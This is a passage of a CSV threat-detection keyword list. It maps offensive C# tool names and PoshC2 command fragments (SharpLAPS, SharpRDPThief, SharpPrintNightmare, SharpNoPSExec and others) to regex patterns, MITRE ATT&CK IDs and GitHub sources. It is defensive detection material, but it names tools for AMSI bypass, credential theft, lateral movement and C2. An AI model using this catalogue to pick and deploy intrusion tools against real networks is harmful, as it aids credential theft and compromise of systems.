TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Sharp-Killer.csproj*",".{0,1000}Sharp\-Killer\.csproj.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*Sharp-Killer.exe*",".{0,1000}Sharp\-Killer\.exe.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*Sharp-Killer.pdb*",".{0,1000}Sharp\-Killer\.pdb.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*SharpKiller-main*",".{0,1000}SharpKiller\-main.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*SharpLAPS.csproj*",".{0,1000}SharpLAPS\.csproj.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*SharpLAPS.exe*",".{0,1000}SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpLAPS.exe*",".{0,1000}SharpLAPS\..{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*SharpLAPS.sln*",".{0,1000}SharpLAPS\.sln.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*SharpLAPS-main*",".{0,1000}SharpLAPS\-main.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","0","N/A","10","4","363","71","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z" "*SharpLDAP.csproj*",".{0,1000}SharpLDAP\.csproj.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","N/A","N/A","N/A","N/A","N/A" "*SharpLDAP.exe*",".{0,1000}SharpLDAP\.exe.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","N/A","N/A","N/A","N/A","N/A" "*SharpLDAP.sln*",".{0,1000}SharpLDAP\.sln.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","N/A","N/A","N/A","N/A","N/A" "*SharpLDAP-main*",".{0,1000}SharpLDAP\-main.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","N/A","N/A","N/A","N/A","N/A" "*SharpLdapRelayScan*",".{0,1000}SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","SharpLdapRelayScan","SharLdapRealyScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/klezVirus/SharpLdapRelayScan","1","1","N/A","7","1","75","17","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z" "*SharpLdapRelayScan*",".{0,1000}SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*SharpMapExec.exe*",".{0,1000}SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpMiniDump*",".{0,1000}SharpMiniDump.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpMiniDump.exe*",".{0,1000}SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpMiniDumpManager*",".{0,1000}SharpMiniDumpManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpMove.exe*",".{0,1000}SharpMove\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpNamedPipePTH.exe*",".{0,1000}SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpNoPSExec.csproj*",".{0,1000}SharpNoPSExec\.csproj.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*SharpNoPSExec.exe*",".{0,1000}SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpNoPSExec.exe*",".{0,1000}SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*SharpNoPSExec.sln*",".{0,1000}SharpNoPSExec\.sln.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*SharpNoPSExec-master*",".{0,1000}SharpNoPSExec\-master.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*SharpPack*",".{0,1000}SharpPack.{0,1000}","offensive_tool_keyword","SharpPack","SharpPack is a toolkit for insider threat assessments that lets you defeat application whitelisting to execute arbitrary DotNet and PowerShell tools.","T1218.010 - T1218.011 - T1059 - T1127 - T1055","TA0002 - TA0008 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/mdsecactivebreach/SharpPack","1","0","N/A","N/A","2","145","34","2018-12-17T11:55:12Z","2018-12-17T10:51:19Z" "*SharpPersistSD.RegHelper*",".{0,1000}SharpPersistSD\.RegHelper.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*SharpPersistSD.SecurityDescriptor*",".{0,1000}SharpPersistSD\.SecurityDescriptor.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*SharpPersistSD.SvcHelper*",".{0,1000}SharpPersistSD\.SvcHelper.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*SharpPrinter.exe*",".{0,1000}SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpPrintNightmare*",".{0,1000}SharpPrintNightmare.{0,1000}","offensive_tool_keyword","SharpPrintNightmare","C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527","T1210 - T1574 - T1204 - T1053 - T1021 - T1068 - T1071","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Exploitation tools","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","10","1790","580","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z" "*sharpps $psversiontable*",".{0,1000}sharpps\s\$psversiontable.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*sharpps get-process*",".{0,1000}sharpps\sget\-process.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*sharppsexec*",".{0,1000}sharppsexec.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpPsExecManager*",".{0,1000}SharpPsExecManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpPsExecService.*",".{0,1000}SharpPsExecService\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpRDP.*.dll.bin*",".{0,1000}SharpRDP\..{0,1000}\.dll\.bin.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*SharpRDP.csproj*",".{0,1000}SharpRDP\.csproj.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*SharpRDP.exe*",".{0,1000}SharpRDP\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpRDP.exe*",".{0,1000}SharpRDP\.exe.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*SharpRDP.sln*",".{0,1000}SharpRDP\.sln.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*SharpRDPHijack.cs*",".{0,1000}SharpRDPHijack\.cs.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","5","407","71","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "*SharpRDPHijack.exe*",".{0,1000}SharpRDPHijack\.exe.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","5","407","71","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "*SharpRDPHijack-master*",".{0,1000}SharpRDPHijack\-master.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","5","407","71","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "*SharpRDP-master*",".{0,1000}SharpRDP\-master.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*SharpRDPThief is a C# implementation of RDPThief*",".{0,1000}SharpRDPThief\sis\sa\sC\#\simplementation\sof\sRDPThief.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*SharpRDPThief.csproj*",".{0,1000}SharpRDPThief\.csproj.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*SharpRDPThief.exe*",".{0,1000}SharpRDPThief\.exe.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*Sharpreflect *",".{0,1000}Sharpreflect\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*SharpReg.exe*",".{0,1000}SharpReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpRoast.exe*",".{0,1000}SharpRoast\.exe.{0,1000}","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","10","1009","205","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" "*sharpsc *cmd*",".{0,1000}sharpsc\s.{0,1000}cmd.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpSCCM*",".{0,1000}SharpSCCM.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "*SharpSCCM.exe*",".{0,1000}SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSCShell*",".{0,1000}SharpSCShell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 